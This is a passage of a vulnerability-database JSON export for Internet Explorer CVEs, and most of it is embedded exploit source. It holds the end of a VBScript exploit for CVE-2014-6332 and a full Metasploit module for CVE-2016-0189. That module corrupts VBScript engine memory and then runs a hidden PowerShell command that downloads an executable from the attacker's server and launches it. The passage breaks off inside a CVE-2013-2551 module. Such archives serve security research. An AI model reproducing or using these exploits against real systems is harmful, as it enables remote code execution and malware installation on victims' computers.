.NET Framework privilege escalation, RDP restrictions bypass, IIS restrictions bypass, IME privilege escalation, kernel-mode drivers DoS.", "edition": 2, "cvss3": {}, "published": "2015-08-24T00:00:00", "title": "Microsoft Windows multiple security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-6337", "CVE-2014-6343", "CVE-2014-4143", "CVE-2014-4077", "CVE-2014-6350", "CVE-2014-6344", "CVE-2014-6332", "CVE-2014-6322", "CVE-2014-6341", "CVE-2014-6348", "CVE-2014-4076", "CVE-2014-6349", "CVE-2014-6351", "CVE-2014-6318", "CVE-2014-6323", "CVE-2014-6339", "CVE-2014-6345", "CVE-2014-6352", "CVE-2014-6342", "CVE-2014-6340", "CVE-2014-6347", "CVE-2014-4149", "CVE-2014-4118", "CVE-2014-6346", "CVE-2014-6317", "CVE-2014-6321", "CVE-2014-6353"], "modified": "2015-08-24T00:00:00", "id": "SECURITYVULNS:VULN:14090", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14090", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T17:45:53", "description": "No description provided by source.", "cvss3": {}, "published": "2013-03-20T00:00:00", "title": "Microsoft Internet Explorer \u4e0d\u660e\u7ec6\u8282\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e(CVE-2013-2551)", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-2551"], "modified": "2013-03-20T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60700", "id": "SSV:60700", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T12:01:24", "description": "No description provided by source.", "cvss3": {}, "published": "2017-03-06T00:00:00", "type": "seebug", "title": "IE Godmode remote code execution vulnerability, CVE-2014-6332\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6332"], "modified": "2017-03-06T00:00:00", 
Then\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Over=True\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0win9x=1\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0End If\u00a0 \r\n\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0redim\u00a0 Preserve aa(a0)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0end function\r\n\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0function ReadMemo(add) \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0On Error Resume 
Next\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0redim\u00a0 Preserve aa(a2)\u00a0 \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0ab(0)=0\u00a0\u00a0 \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0aa(a1)=add+4\u00a0\u00a0\u00a0\u00a0 \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0ab(0)=1.69759663316747E-313\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0ReadMemo=lenb(aa(a1))\u00a0 \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0ab(0)=0\u00a0\u00a0\u00a0 
\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0redim\u00a0 Preserve aa(a0)\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0end function\r\n\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0</script>\"\"\")\r\n\u00a0\r\nif __name__ == '__main__':\r\n\u00a0\u00a0\u00a0\u00a0sclass = BaseHTTPServer.HTTPServer\r\n\u00a0\u00a0\u00a0\u00a0server = sclass((socket.gethostbyname(socket.gethostname()), 80), RequestHandler)\r\n\u00a0\u00a0\u00a0\u00a0print \"Http server started\", socket.gethostbyname(socket.gethostname()), 80\r\n\u00a0\u00a0\u00a0\u00a0try:\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0server.serve_forever()\r\n\u00a0\u00a0\u00a0\u00a0except KeyboardInterrupt:\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0pass\r\n\u00a0\u00a0\u00a0\u00a0server.server_close()\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-89272", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T12:04:30", "description": "No description provided by source.", "cvss3": {}, "published": "2016-08-08T00:00:00", "type": "seebug", "title": "Internet Explorer 11 VBScript engine memory corruption vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-0189"], "modified": "2016-08-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92247", "id": "SSV:92247", "sourceData": "\n ##\r\n# This module requires 
Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\nRank = NormalRanking\r\n\r\ninclude Msf::Exploit::Remote::HttpServer\r\ninclude Msf::Exploit::EXE\r\n\r\ndef initialize(info={})\r\nsuper(update_info(info,\r\n'Name' => \"Internet Explorer 11 VBScript Engine Memory Corruption\",\r\n'Description' => %q{\r\nThis module exploits the memory corruption vulnerability (CVE-2016-0189)\r\npresent in the VBScript engine of Internet Explorer 11.\r\n},\r\n'License' => MSF_LICENSE,\r\n'Author' => [\r\n'Theori', # Original RE research and exploitation\r\n'William Webb <william_webb[at]rapid7.com>' # Metasploit module\r\n],\r\n'Platform' => 'win',\r\n'Targets' =>\r\n[\r\n[ 'Automatic', {} ],\r\n[ 'Windows 10 with IE 11', { } ]\r\n],\r\n'References' =>\r\n[\r\n[ 'CVE', '2016-0189' ],\r\n[ 'MSB', 'MS16-051' ]\r\n],\r\n'Arch' => ARCH_X86_64,\r\n'DisclosureDate' => \"May 10 2016\",\r\n'DefaultTarget' => 0))\r\nend\r\n\r\ndef setup\r\n# @stage2html = Rex::Text.rand_text_alphanum(6)\r\n@ieshell = \"#{Rex::Text.rand_text_alphanumeric(6)}\" # ieshell32.dll uri\r\n@localsrv = \"#{Rex::Text.rand_text_alphanumeric(6)}\" # ielocalserver.dll uri\r\n@pm_escape_html = \"#{Rex::Text.rand_text_alphanumeric(6)}\" # vbscipt_godmode.html\r\n@payload_uri = \"#{Rex::Text.rand_text_alphanumeric(8)}\"\r\n@payload_exe = \"#{Rex::Text.rand_text_alpha(6)}.exe\"\r\nFile.open(File.join( Msf::Config.data_directory, \"exploits\", \"cve-2016-0189\", \"ieshell32.dll\" ), \"rb\") { |f| @stage2dll = f.read }\r\nFile.open(File.join( Msf::Config.data_directory, \"exploits\", \"cve-2016-0189\", \"ielocalserver.dll\" ), \"rb\") { |f| @localserver = f.read }\r\nsuper\r\nend\r\n\r\ndef exploit_html(req_uri)\r\nsrvhost = datastore['SRVHOST']\r\nsrvport = datastore['SRVPORT']\r\n\r\ntemplate = <<-EOF\r\n<html>\r\n<head>\r\n<meta http-equiv=\"x-ua-compatible\" 
content=\"IE=10\">\r\n</head>\r\n<body>\r\n\r\n<script type=\"text/vbscript\">\r\nDim downloadFiles\r\nDim cacheRegex\r\nDim cacheFiles(3)\r\n\r\nDim downloadState\r\nDim pinTime\r\n\r\nDim oFSO\r\nDim oWS\r\nDim shell\r\n\r\nfunction FindFile(path, regexFile)\r\nFindFile = \"\"\r\nFor Each f in oFSO.GetFolder(path).Files\r\nIf regexFile.Test(f.Name) Then\r\nFindFile = f.Name\r\nExit For\r\nEnd If\r\nNext\r\nend function\r\n\r\nfunction SearchCache(path, regexFile)\r\nSearchCache = \"\"\r\nFor Each fld in oFSO.GetFolder(path).SubFolders\r\n'If DateDiff(\"s\", pinTime, fld.DateLastModified) >= 0 Then\r\nfilename = FindFile(path & \"\" & fld.Name, regexFile)\r\nIf filename <> \"\" Then\r\nSearchCache = path & \"\" & fld.Name & \"\" & filename\r\nExit For\r\nEnd If\r\n'End If\r\nNext\r\nend function\r\n\r\nfunction loaddll()\r\nOn Error Resume Next\r\n\r\nSet wshSystemEnv = oWS.Environment(\"Process\")\r\ntmpDir = oFSO.GetSpecialFolder(2)\r\n\r\ntmpSysDir = tmpDir & \"System32\"\r\ntmpShellFile = tmpSysDir & \"shell32.dll\"\r\noFSO.CreateFolder(tmpSysDir)\r\noFSO.MoveFile cacheFiles(0), tmpShellFile\r\n\r\nmydllFile = tmpDir & \"\" & downloadFiles(1)\r\noFSO.MoveFile cacheFiles(1), mydllFile\r\nwshSystemEnv(\"MyDllPath\") = mydllFile\r\n\r\nIf (UBound(downloadFiles) = 2) Then\r\nstage2File = tmpDir & \"#{@pm_escape_html}.html\"\r\noFSO.MoveFile cacheFiles(2), stage2File\r\nwshSystemEnv(\"stage2file\") = stage2File\r\nEnd If\r\n\r\nsaveRoot = wshSystemEnv(\"SystemRoot\")\r\nwshSystemEnv(\"SaveSystemRoot\") = saveRoot\r\nwshSystemEnv(\"SystemRoot\") = tmpDir\r\nSet shell = CreateObject(\"Shell.Application\")\r\n\r\nIf (UBound(downloadFiles) = 2) Then\r\ncall tolocal()\r\nEnd If\r\nend function\r\n\r\nSub OnDownloadDone()\r\nIf InStr(userAgent, \"NT 5.\") > 0 Then\r\ncacheDir = oWS.ExpandEnvironmentStrings(\"%USERPROFILE%\")\r\ncacheDir = cacheDir & \"Local SettingsTemporary Internet FilesLowIE\"\r\nElse\r\ncacheDir = 
oWS.ExpandEnvironmentStrings(\"%LOCALAPPDATA%\")\r\ncacheDir = cacheDir & \"MicrosoftWindowsTemporary Internet FilesLowIE\"\r\nEnd If\r\n\r\nSet regexFile = new regexp\r\nregexFile.Pattern = cacheRegex(downloadState)\r\ncacheFiles(downloadState) = SearchCache(cacheDir, regexFile)\r\nIf cacheFiles(downloadState) = \"\" Then\r\nExit Sub\r\nEnd If\r\n\r\nIf downloadState = UBound(downloadFiles) Then\r\nloaddll()\r\nElse\r\ndownloadState = downloadState + 1\r\nDoDownload()\r\nEnd If\r\nEnd Sub\r\n\r\nSub DoDownload()\r\npinTime = Now\r\ncall getdll(downloadFiles(downloadState))\r\nEnd Sub\r\n\r\nSub runshell()\r\ndownloadFiles = Array(\"#{@ieshell}.dll\", \"#{@localsrv}.dll\", \"#{@pm_escape_html}.html\")\r\ncacheRegex = Array(\"^#{@ieshell}[d].dll$\", \"^#{@localsrv}[d].dll$\", \"^#{@pm_escape_html}[d].htm$\")\r\nSet oFSO = CreateObject(\"Scripting.FileSystemObject\")\r\nSet oWS = CreateObject(\"WScript.Shell\")\r\ndownloadState = 0\r\nDoDownload()\r\nEnd Sub\r\n\r\n</script>\r\n\r\n<script type=\"text/vbscript\">\r\nDim bl\r\nDim plunge(32)\r\nDim y(32)\r\nprefix = \"%u4141%u4141\"\r\nd = prefix & \"%u0016%u4141%u4141%u4141%u4242%u4242\"\r\nb = String(64000, \"D\")\r\nc = d & b\r\nx = UnEscape(c)\r\n\r\nClass ArrayWrapper\r\nDim A\r\n\r\nPrivate Sub Class_Initialize\r\nReDim Preserve AA(1, 2000)\r\nA = AA\r\nEnd Sub\r\n\r\nPublic Sub Resize()\r\nReDim Preserve A(1, 1)\r\nEnd Sub\r\nEnd Class\r\n\r\nClass Spray\r\nEnd Class\r\n\r\n\r\nFunction getAddr (arg1, s)\r\nbl = Null\r\nSet bl = New ArrayWrapper\r\n\r\nFor i = 0 To 32\r\nSet plunge(i) = s\r\nNext\r\n\r\nSet bl.A(arg1, 2) = s\r\n\r\nDim addr\r\nDim i\r\nFor i = 0 To 31\r\nIf Asc(Mid(y(i), 3, 1)) = VarType(s) Then\r\naddr = strToInt(Mid(y(i), 3 + 4, 2))\r\nEnd If\r\ny(i) = Null\r\nNext\r\n\r\nIf addr = Null Then\r\ndocument.location.href = document.location.href\r\nReturn\r\nEnd If\r\n\r\ngetAddr = addr\r\nEnd Function\r\n\r\nFunction leakMem (arg1, addr)\r\nd = prefix & \"%u0008%u4141%u4141%u4141\"\r\nc = d & 
intToStr(addr) & b\r\nx = UnEscape(c)\r\n\r\nbl = Null\r\nSet bl = New ArrayWrapper\r\n\r\nDim o\r\no = bl.A(arg1, 2)\r\n\r\nleakMem = o\r\nEnd Function\r\n\r\nSub overwrite (arg1, addr)\r\nd = prefix & \"%u400C%u0000%u0000%u0000\"\r\nc = d & intToStr(addr) & b\r\nx = UnEscape(c)\r\n\r\nbl = Null\r\nSet bl = New ArrayWrapper\r\nbl.A(arg1, 2) = CSng(0)\r\nEnd Sub\r\n\r\nFunction exploit (arg1)\r\nDim addr\r\nDim csession\r\nDim olescript\r\nDim mem\r\n\r\nSet sp = New Spray\r\naddr = getAddr(arg1, sp)\r\nmem = leakMem(arg1, addr + 8)\r\ncsession = strToInt(Mid(mem, 3, 2))\r\nmem = leakMem(arg1, csession + 4)\r\nolescript = strToInt(Mid(mem, 1, 2))\r\noverwrite arg1, olescript + &H174\r\nrunshell()\r\n\r\nEnd Function\r\n\r\nFunction triggerBug\r\nbl.Resize()\r\n\r\nDim i\r\nFor i = 0 To 32\r\ny(i) = Mid(x, 1, 24000)\r\nNext\r\nEnd Function\r\n</script>\r\n\r\n<script type=\"text/javascript\">\r\nvar userAgent = navigator.userAgent;\r\nvar oReq;\r\nfunction getdll(downloadFile)\r\n{\r\noReq = new XMLHttpRequest();\r\noReq.open(\"GET\", \"http://#{srvhost}:#{srvport}#{req_uri}/\"+downloadFile, true);\r\noReq.onreadystatechange = handler;\r\noReq.send();\r\n}\r\nfunction handler()\r\n{\r\nif (oReq.readyState == 4 && oReq.status == 200) {\r\nOnDownloadDone();\r\n}\r\n}\r\nfunction tolocal()\r\n{\r\nlocation.href = \"http://localhost:5555/#{@pm_escape_html}.html\";\r\n}\r\nfunction strToInt(s)\r\n{\r\nreturn s.charCodeAt(0) | (s.charCodeAt(1) << 16);\r\n}\r\nfunction intToStr(x)\r\n{\r\nreturn String.fromCharCode(x & 0xffff) + String.fromCharCode(x >> 16);\r\n}\r\nvar o;\r\no = {\"valueOf\": function () {\r\ntriggerBug();\r\nreturn 1;\r\n}};\r\nsetTimeout(function() {exploit(o);}, 50);\r\n</script>\r\n</body>\r\n</html>\r\nEOF\r\n\r\ntemplate\r\nend\r\n\r\ndef stage2_html(req_uri)\r\n\r\ntemplate = <<-EOF\r\n<html>\r\n<head>\r\n<meta http-equiv=\"x-ua-compatible\" content=\"IE=10\">\r\n</head>\r\n<body>\r\n<script type=\"text/vbscript\">\r\nDim aw\r\nDim 
plunge(32)\r\nDim y(32)\r\nprefix = \"%u4141%u4141\"\r\nd = prefix & \"%u0016%u4141%u4141%u4141%u4242%u4242\"\r\nb = String(64000, \"D\")\r\nc = d & b\r\nx = UnEscape(c)\r\n\r\nClass ArrayWrapper\r\nDim A()\r\nPrivate Sub Class_Initialize\r\nReDim Preserve A(1, 2000)\r\nEnd Sub\r\n\r\nPublic Sub Resize()\r\nReDim Preserve A(1, 1)\r\nEnd Sub\r\nEnd Class\r\n\r\nClass Dummy\r\nEnd Class\r\n\r\nFunction getAddr (arg1, s)\r\naw = Null\r\nSet aw = New ArrayWrapper\r\n\r\nFor i = 0 To 32\r\nSet plunge(i) = s\r\nNext\r\n\r\nSet aw.A(arg1, 2) = s\r\n\r\nDim addr\r\nDim i\r\nFor i = 0 To 31\r\nIf Asc(Mid(y(i), 3, 1)) = VarType(s) Then\r\naddr = strToInt(Mid(y(i), 3 + 4, 2))\r\nEnd If\r\ny(i) = Null\r\nNext\r\n\r\nIf addr = Null Then\r\ndocument.location.href = document.location.href\r\nReturn\r\nEnd If\r\n\r\ngetAddr = addr\r\nEnd Function\r\n\r\nFunction leakMem (arg1, addr)\r\nd = prefix & \"%u0008%u4141%u4141%u4141\"\r\nc = d & intToStr(addr) & b\r\nx = UnEscape(c)\r\n\r\naw = Null\r\nSet aw = New ArrayWrapper\r\n\r\nDim o\r\no = aw.A(arg1, 2)\r\n\r\nleakMem = o\r\nEnd Function\r\n\r\nSub overwrite (arg1, addr)\r\nd = prefix & \"%u400C%u0000%u0000%u0000\"\r\nc = d & intToStr(addr) & b\r\nx = UnEscape(c)\r\n\r\naw = Null\r\nSet aw = New ArrayWrapper\r\naw.A(arg1, 2) = CSng(0)\r\nEnd Sub\r\n\r\nFunction exploit (arg1)\r\nDim addr\r\nDim csession\r\nDim olescript\r\nDim mem\r\n\r\nSet dm = New Dummy\r\naddr = getAddr(arg1, dm)\r\nmem = leakMem(arg1, addr + 8)\r\ncsession = strToInt(Mid(mem, 3, 2))\r\nmem = leakMem(arg1, csession + 4)\r\nolescript = strToInt(Mid(mem, 1, 2))\r\noverwrite arg1, olescript + &H174\r\n\r\nSet shObj = CreateObject(\"Wscript.shell\")\r\nshObj.Run(\"PowerShell -nologo -WindowStyle Hidden $d=$env:temp+'#{@payload_exe}';(New-Object System.Net.WebClient).DownloadFile('http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{req_uri}/#{@payload_uri}',$d);Start-Process $d\")\r\nshObj.Run(\"%temp%#{@payload_exe}\")\r\n\r\nEnd Function\r\n\r\nFunction 
triggerBug\r\naw.Resize()\r\n\r\nDim i\r\nFor i = 0 To 32\r\ny(i) = Mid(x, 1, 24000)\r\nNext\r\nEnd Function\r\n</script>\r\n\r\n<script type=\"text/javascript\">\r\nfunction strToInt(s)\r\n{\r\nreturn s.charCodeAt(0) | (s.charCodeAt(1) << 16);\r\n}\r\nfunction intToStr(x)\r\n{\r\nreturn String.fromCharCode(x & 0xffff) + String.fromCharCode(x >> 16);\r\n}\r\nvar o;\r\no = {\"valueOf\": function () {\r\ntriggerBug();\r\nreturn 1;\r\n}};\r\nsetTimeout(function() {exploit(o);}, 50);\r\n</script>\r\n</body>\r\n</html>\r\n\r\nEOF\r\ntemplate\r\nend\r\n\r\ndef on_request_uri(cli, request)\r\n# used for some debugging stuff\r\nies = @ieshell\r\nls = @localsrv\r\npm = @pm_escape_html\r\n\r\nprint_status(\"Received request: #{request.uri}\")\r\nif request.uri =~ /.*#{ies}.*$/\r\nprint_status(\"Sending stage two DLL ...\")\r\nsend_response(cli, @stage2dll, { 'Content-Type' => 'application/x-msdownload', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })\r\nelsif request.uri =~ /.*#{ls}.*$/\r\nprint_status(\"Sending local server DLL ...\")\r\nsend_response(cli, @localserver, { 'Content-Type' => 'application/x-msdownload', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })\r\nelsif request.uri =~ /.*#{pm}.*$/\r\nrq = \"#{get_resource.chomp('/')}\"\r\ngm = stage2_html(rq)\r\nsend_response(cli, gm, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })\r\nelsif request.uri =~ /.*#{@payload_uri}$/\r\nreturn if ((payload = regenerate_payload(cli)) == nil)\r\nprint_status(\"Sending payload ...\")\r\nsend_response(cli, generate_payload_exe({ :code => payload.encoded }), { 'Content-Type' => 'application/octet-stream', 'Connection' => 'close' })\r\nelse\r\nprint_status(\"Sending main page ..\")\r\nsend_response(cli, exploit_html(request.uri))\r\nend\r\nend\r\n\r\nend\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-92247", "cvss": {"score": 7.6, "vector": 
"AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:24", "description": "", "cvss3": {}, "published": "2013-06-13T00:00:00", "type": "packetstorm", "title": "MS13-009 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-2551"], "modified": "2013-06-13T00:00:00", "id": "PACKETSTORM:121997", "href": "https://packetstormsecurity.com/files/121997/MS13-009-Microsoft-Internet-Explorer-COALineDashStyleArray-Integer-Overflow.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::RopDb \ninclude Msf::Exploit::Remote::BrowserAutopwn \n \nautopwn_info({ \n:ua_name => HttpClients::IE, \n:ua_minver => \"8.0\", \n:ua_maxver => \"8.0\", \n:javascript => true, \n:os_name => OperatingSystems::WINDOWS, \n:rank => Rank \n}) \n \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"MS13-009 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow\", \n'Description' => %q{ \nThis module exploits an integer overflow vulnerability on Internet Explorer. \nThe vulnerability exists in the handling of the dashstyle.array length for vml \nshapes on the vgx.dll module. This module has been tested successfully on Windows 7 \nSP1 with IE8. It uses the the JRE6 to bypass ASLR by default. In addition a target \nto use an info leak to disclose the ntdll.dll base address is provided. 
This target \nrequires ntdll.dll v6.1.7601.17514 (the default dll version on a fresh Windows 7 SP1 \ninstallation) or ntdll.dll v6.1.7601.17725 (version installed after apply MS12-001). \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Nicolas Joly', # Vulnerability discovery, PoC and analysis \n'4B5F5F4B', # PoC \n'juan vazquez' # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2013-2551' ], \n[ 'OSVDB', '91197' ], \n[ 'BID', '58570' ], \n[ 'MSB', 'MS13-037' ], \n[ 'URL', 'http://www.vupen.com/blog/20130522.Advanced_Exploitation_of_IE10_Windows8_Pwn2Own_2013.php' ], \n[ 'URL', 'http://binvul.com/viewthread.php?tid=311' ] \n], \n'Payload' => \n{ \n'Space' => 948, \n'DisableNops' => true, \n'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500 \n}, \n'DefaultOptions' => \n{ \n'InitialAutoRunScript' => 'migrate -f' \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Automatic', {} ], \n[ 'IE 8 on Windows 7 SP1 with JRE ROP', # default \n{ \n'Rop' => :jre, \n'Offset' => '0x5f4' \n} \n], \n# requires: \n# * ntdll.dll v6.1.7601.17514 (fresh W7SP1 installation) \n# * ntdll.dll v6.1.7601.17725 (MS12-001) \n[ 'IE 8 on Windows 7 SP1 with ntdll.dll Info Leak', \n{ \n'Rop' => :ntdll, \n'Offset' => '0x5f4' \n} \n] \n], \n'Privileged' => false, \n'DisclosureDate' => \"Mar 06 2013\", \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) \n], self.class) \n \nend \n \ndef exploit \n@second_stage_url = rand_text_alpha(10) \n@leak_param = rand_text_alpha(5) \nsuper \nend \n \ndef get_target(agent) \n#If the user is already specified by the user, we'll just use that \nreturn target if target.name != 'Automatic' \n \nnt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || '' \nie = agent.scan(/MSIE (\\d)/).flatten[0] || '' \n \nie_name = \"IE #{ie}\" \n \ncase nt \nwhen '5.1' \nos_name = 'Windows XP SP3' \nwhen '6.0' \nos_name = 'Windows Vista' \nwhen '6.1' 
